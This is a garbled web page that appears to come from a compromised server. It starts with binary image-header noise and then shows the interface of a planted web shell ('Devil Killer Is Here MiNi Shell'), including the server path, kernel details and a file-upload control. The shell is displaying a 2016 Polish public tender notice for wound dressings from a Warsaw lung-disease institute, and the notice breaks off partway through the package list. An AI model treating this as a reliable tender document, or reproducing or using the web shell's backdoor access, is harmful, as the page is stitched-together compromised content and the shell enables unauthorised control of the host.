JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160222/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160222/38932-N-2016.html

<p class="kh_header"><b>Warszawa: Na dostawę materiałów opatrunkowych określonych w 19 pakietach.</b><br>
<b>Numer ogłoszenia: 38932 - 2016; data zamieszczenia: 22.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Gruźlicy i Chorób Płuc , ul. Płocka 26, 01-138 Warszawa, woj. mazowieckie, tel. 43 12 312.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.igichp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Na dostawę materiałów opatrunkowych określonych w 19 pakietach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów opatrunkowych określonych w 19 pakietach:
- Pakiet nr 1: Opatrunki  jałowe, antybakteryjne, żelowe, hydrokoloidowe, samoprzylepne, rękawy opatrunkowe, opatrunki dla ran wymagających aktywnego oczyszczania, opatrunki z pianki poliuretanowej;
- Pakiet nr 2: Gaza bawełniana, lignina, opaski, wata opatrunkowa;
-Pakiet nr 3: Plastry opatrunkowe, przylepce chirurgiczne, przylepce hypoalergiczne, opatrunki włókninowe sterylne, system do zamykania ran;
-Pakiet nr 4: Bakteriobójcze opatrunki z PU, przezroczyste opatrunki z PU, dodatek plastycyzera,  repozycjonowalny przylepiec chirurgiczny;
-Pakiet nr 5: Gaza opatrunkowa, kompresy gazowe jałowe;
-Pakiet nr 6: Kompresy gazowe niejałowe;
-Pakiet nr 7: Serwety jałowe z włókniny, serwety operacyjne jałowe;
-Pakiet nr 8: Włókninowe opatrunki wyspowe;
-Pakiet nr 9: Kompresy jałowe, gazowe;
-Pakiet nr 10: Opatrunki do stabilizacji cewników epiduralnych, plastry do stabilizacji cewników donosowych;
-Pakiet nr 11: Kompresy włókninowe jałowe, jałowe opatrunki oczne;
-Pakiet nr 12: Kompresy włókninowe;
-Pakiet nr 13: Serwety operacyjne jałowe;
-Pakiet nr 14: Tupfery jałowe z gazy;
-Pakiet nr 15: Zestawy do operacji klatki piersiowej;
-Pakiet nr 16: Antyseptyczne sterylne opatrunki parafinowe z gazy;
-Pakiet nr 17: Chusty trójkątne z tkaniny bawełnianej, setony jałowe z gazy;
-Pakiet nr 18: Wata bawełniana jałowa;
-Pakiet nr 19: Chłonny opatrunek w technologii hydrofiber..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1, 33.14.11.10-4, 33.14.11.12-8, 33.14.11.11-1, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.14.11.16-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonego do oferty oświadczenia wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonego do oferty oświadczenia wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonego do oferty oświadczenia wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonego do oferty oświadczenia wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonego do oferty oświadczenia wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego, wykonawca powinien dołączyć do oferty:
1. dokumenty potwierdzające, że przedmiot zamówienia został wprowadzony do obrotu zgodnie z wymogami ustawy o wyrobach medycznych z dnia 20 maja 2010 r. (Dz. U. Nr 107, poz. 679 z późn. zm.). W przypadku, gdy opisany w SIWZ przedmiot zamówienia nie został sklasyfikowany jako wyrób medyczny zamawiający wymaga złożenia stosownego oświadczenia, że przedmiot zamówienia nie podlega ustawie o wyrobach medycznych;
2. próbki oferowanego przedmiotu zamówienia po 2 szt. wraz z etykietami do wszystkich pozycji wymienionych w formularzu asortymentowo cenowym - Załącznik nr 2 do SIWZ, oprócz poz. od nr. 32 do nr. 39 wymienionych w Pakiecie nr 1.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty, w formie oryginału lub notarialnie poświadczonej kopii, potwierdzające uprawnienie osób do podpisania oferty i innych dokumentów, o ile nie wynikają z przepisów prawa lub innych dołączonych do oferty dokumentów rejestrowych. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie - złożone nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - Termin dostawy - 1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§1ust.2.Zamawiający zastrzega sobie prawo do nie złożenia zamówienia na towar o wartości nie wyższej niż 20% łącznej wartości towaru objętego niniejszą umową z powodu nie możliwej do przewidzenia liczby pacjentów i procedur medycznych, na co Wykonawca Wyraża zgodę.
§2ust.3.Ceny netto są stałe i niezmienne przez cały okres obowiązywania umowy. Cena brutto może ulec zmianie podczas obowiązywania niniejszej umowy jedynie w przypadku zmiany stawki podatku VAT.
§2ust.4.Zmiana ceny w przypadku określonym w ust. 3 wiąże Strony umowy z mocy prawa i nie wymaga dokonywania zmiany niniejszej umowy w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.igichp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Gruźlicy i Chorób Płuc, ul. Płocka 26, 01-138 Warszawa, budynek E, lok. 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2016 godzina 09:00, miejsce: Instytut Gruźlicy i Chorób Płuc, ul. Płocka 26, 01-138 Warszawa, budynek E, lok. 24.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1: Opatrunki jałowe, antybakteryjne, żelowe, hydrokoloidowe, samoprzylepne, rękawy opatrunkowe, opatrunki dla ran wymagających aktywnego oczyszczania, opatrunki z pianki poliuretanowej:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Antybakteryjny, jałowy opatrunek z maścią z siatki poliamidowej.	szt.	700
-2.	Antybakteryjny, jałowy opatrunek z maścią z siatki poliamidowej.	szt.	50
-3.	Antybakteryjny, jałowy opatrunek z maścią z siatki poliamidowej.	szt.	250
-4.	Opatrunek jałowy z siatki bawełnianej o dużych oczkach. 	szt.	800
-5.	Opatrunek jałowy z siatki bawełnianej o dużych oczkach. 	szt.	200
-6.	Opatrunek cienki hydrokoloidowy.	szt.	30
-7.	Opatrunek cienki hydrokoloidowy. 	szt.	9
-8.	Opatrunek hydrokoloidowy. 	szt.	50
-9.	Amorficzny żel w dozowniku.	szt.	10
-10.	Przezroczysty opatrunek hydrożelowy.	szt.	15
-11.	Przezroczysty, samoprzylepny opatrunek z folii poliuretanowej.	szt.	100
-12.	Przezroczysty, samoprzylepny opatrunek z folii poliuretanowej.	szt.	1500
-13.	Przezroczysty, samoprzylepny opatrunek z folii poliuretanowej.	szt.	550
-14.	Jałowy opatrunek z miękkich włókien alginianów wapnia.	szt.	30
-15.	Jałowy opatrunek z miękkich włókien alginianów wapnia.	szt.	40
-16.	Rękaw opatrunkowy siatkowy.	szt.	10
-17.	Rękaw opatrunkowy siatkowy.	szt.	520
-18.	Rękaw opatrunkowy siatkowy.	szt.	35
-19.	Rękaw opatrunkowy siatkowy.	szt.	10
-20.	Rękaw opatrunkowy siatkowy.	szt.	30
-21.	Opatrunek dla ran wymagających aktywnego oczyszczania. 	szt.	200
-22.	Opatrunek dla ran wymagających aktywnego oczyszczania.	szt.	100
-23.	Opatrunek dla ran wymagających aktywnego oczyszczania.	szt.	30
-24.	Opatrunek z pianki poliuretanowej do ran z wysiękiem obfitym.	szt.	50
-25.	Opatrunek z pianki poliuretanowej do ran z wysiękiem obfitym.	szt.	15
-26.	Opatrunek z pianki poliuretanowej do ran z wysiękiem obfitym.	szt.	9
-27.	Opatrunek z pianki poliuretanowej do ran z wysiękiem obfitym.	szt.	15
-28.	Opatrunek z pianki poliuretanowej do ran z wysiękiem obfitym.	szt.	15
-29.	Opatrunek z pianki poliuretanowej do ran w wysiękiem obfitym.	szt.	9
-30.	Hydroaktywny opatrunek z pianki poliuretanowej.	szt.	9
-31.	Hydroaktywny opatrunek z pianki poliuretanowej.	szt.	9
-32.	Jałowy zestaw opatrunkowy S mały do podciśnieniowej terapii leczenia ran.	op.	5
-33.	Jałowy zestaw opatrunkowy M średni do podciśnieniowej terapii leczenia ran.	op.	10
-34.	Jałowy zestaw opatrunkowy L duży do podciśnieniowej terapii leczenia ran.	op.	3
-35.	Jałowy zestaw opatrunkowy XL do podciśnieniowej terapii leczenia ran.	op.	3
-36.	Jałowy zbiornik na wydzielinę.	op.	3
-37.	Jałowy zbiornik na wydzielinę.	op.	5
-38.	Jałowa silikonowa warstwa kontaktowa chroniąca skórę i zapobiegająca przywieraniu opatrunku wtórnego.	op.	2
-39.	Jałowe dodatkowe złącze Y umożliwiające podłączenie dwóch opatrunków do jednego zbiornika na wydzielinę. 	op.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1, 33.14.11.10-4, 33.14.11.12-8, 33.14.11.11-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2: Gaza bawełniana, lignina, opaski, wata opatrunkowa:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Gaza bawełniana niejałowa.	m.b.	50 000
-2.	Lignina.	kg	4 100
-3.	Opaska dziana podtrzymująca.	szt.	250
-4.	Opaska dziana podtrzymująca.	szt.	3 000
-5.	Opaska dziana podtrzymująca.	szt.	250
-6.	Opaska elastyczna tkana z zapinką.	szt.	384
-7.	Opaska elastyczna tkana z zapinką.	szt.	200
-8.	Opaska lekko wyścielająca. 	szt.	40
-9.	Opaska lekko wyścielająca.	szt.	60
-10.	Wata opatrunkowa. 	op	280.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3: Plastry opatrunkowe, przylepce chirurgiczne, przylepce hypoalergiczne, opatrunki włókninowe sterylne, system do zamykania ran:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Plaster opatrunkowy włókninowy, hipoalergiczny. 	op.	636
-2.	Przylepiec chirurgiczny, hypoalergiczny.	szt.	420
-3.	Przylepiec chirurgiczny, z włókniny poliestrowej.	szt.	570
-4.	Przylepiec chirurgiczny, z włókniny poliestrowej. 	szt.	4 200
-5.	Przylepiec hipoalergiczny. 	szt.	1 200
-6.	Przylepiec hypoalergiczny.      	szt.	300
-7.	Sterylny, włókninowy opatrunek do zabezpieczania wkłuć obwodowych. 	szt.	30 000
-8.	System do zamykania ran. 	szt.	100
-9.	System do zamykania ran.	szt.	100
-10.	System do zamykania ran.	szt.	100
-11.	System do zamykania ran.	szt.	150
-12.	Przylepiec chirurgiczny, włókninowy, hipoalergiczny. 	szt.	108
-13.	Przylepiec chirurgiczny, włókninowy, hipoalergiczny. 	szt.	50
-14.	Przylepiec chirurgiczny, włókninowy, hipoalergiczny. 	szt.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1, 33.14.11.11-1, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4: Bakteriobójcze opatrunki z PU, przezroczyste opatrunki z PU, dodatek plastycyzera,  repozycjonowalny przylepiec chirurgiczny:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Bakteriobójczy opatrunek z PU do cewników centralnych.	szt.	600
-2.	Bakteriobójczy opatrunek z PU do cewników centralnych.	szt.	500
-3.	Przezroczysty opatrunek z PU do cewników centralnych.  	szt.	1 200
-4.	Przezroczysty opatrunek z PU do cewników centralnych. 	szt.	600
-5.	Przezroczysty opatrunek z PU do kaniul obwodowych. 	szt.	1 600
-6.	Sterylny przezroczysty opatrunek z PU.	szt.	350
-7.	Przezroczysty opatrunek z PU z wcięciem do kaniul obwodowych. 	szt.	5 300
-8.	Przezroczysty opatrunek z PU z wcięciem do cewników centralnych.	szt.	1 800
-9.	Przezroczysty opatrunek z PU z wcięciem do cewników centralnych.	szt.	1 000
-10.	Dodatek plastycyzera. 	szt.	24
-11.	Repozycjonowalny przylepiec chirurgiczny.	szt.	24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1, 33.14.11.10-4, 33.14.11.11-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - Gaza opatrunkowa, kompresy gazowe jałowe:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Gaza opatrunkowa. 	szt.	400
-2.	Kompres jałowy, gazowy. 	op.	28 800
-3.	Kompres jałowy, gazowy. 	op.	11 000
-4.	Kompres jałowy, gazowy. 	op.	7 200
-5.	Kompresy gazowe jałowe. 	op.	2 700
-6.	Kompresy gazowe jałowe.	op.	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.14-2, 33.14.11.19-7.</p></li>
